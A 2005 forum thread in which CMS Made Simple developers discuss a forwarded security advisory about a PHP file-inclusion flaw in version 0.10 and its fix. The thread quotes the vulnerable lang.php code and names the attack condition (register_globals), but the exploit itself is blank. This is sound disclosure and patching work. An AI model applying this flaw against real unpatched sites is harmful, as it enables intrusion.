Security Announce: CMS Made Simple <= 0.10 - PHP injection

Akrabat · **Posted:** Thu Sep 01, 2005 7:49 am

I belong to phpsec, a security mailing list and this mail turned up this morning. Not sure if you've seen it yet Wishy?

Quote:

------ Forwarded Message
From:
Date: 31 Aug 2005 19:18:04 -0000
To:
Subject: CMS Made Simple <= 0.10 - PHP injection

-- == -- == -- == -- == -- == -- == -- == -- == -- == --
Name: CMS Made Simple - PHP injection
Version <= 0.10
Homepage: http://www.cmsmadesimple.org/

Author: Filip Groszynski (VXSfx)
Date: 31 August 2005
-- == -- == -- == -- == -- == -- == -- == -- == -- == --

Background:

CMS Made Simple is an easy to use content managment system for simple stable content site. Uses PHP, MySQL and Smarty templating system.

--------------------------------------------------------

Vulnerable code exist in ./admin/lang.php:

...
$current_language = "en_US";
#Only do language stuff for admin pages
[!] if (isset($CMS_ADMIN_PAGE)) {
...
#Check to see if there is already a language in use...
if (isset($_POST["change_cms_lang"])) {
[!] $current_language = $_POST["change_cms_lang"];
setcookie("cms_language", $_POST["change_cms_lang"]);
} else if (isset($_COOKIE["cms_language"])) {
$current_language = $_COOKIE["cms_language"];
}
else {
...
}

#Ok, we have a language to load, let's load it already...
if (isset($nls['file'][$current_language])) {
foreach ($nls['file'][$current_language] as $onefile) {
[!] include($onefile);
}
}
...
}
...
?>
--------------------------------------------------------

Exploit:

example.html:

EOF

--------------------------------------------------------

Contact:

Author: Filip Groszynski (VXSfx)
Location: Poland
Email: groszynskif <|> gmail <|> com

-- == -- == -- == -- == -- == -- == -- == -- == -- == --

------ End of Forwarded Message

--
[phpsec] Mailing List
Brought to you by php|architect - http://www.phparch.com

For account maintenance, please visit http://www.phparch.com/phpsec

Reading the example exploit, I'm pretty sure that it can only occur with register_globals set to on. However, still needs fixing.

Possible fix:
Ensure that $onefile is a local file within the expected cmsms directory before including it. (Probably have to store the "expected cms directory" as a define/const maybe?)

Rob...

Ted · **Posted:** Thu Sep 01, 2005 9:45 am

Actually, I was going to release a fix this morning. I was just going to make sure $nls and $lang were declared as blank arrays at the top of the page. This way, even if $nls was passed with register_globals on, any offending URLs would get blown away.

Make sense?

Ted · **Posted:** Thu Sep 01, 2005 12:29 pm

http://forum.cmsmadesimple.org/index.ph ... 554.0.html

Akrabat · **Posted:** Thu Sep 01, 2005 3:25 pm

Looks good to me.

Security Announce: CMS Made Simple <= 0.10 - PHP injection

Who is online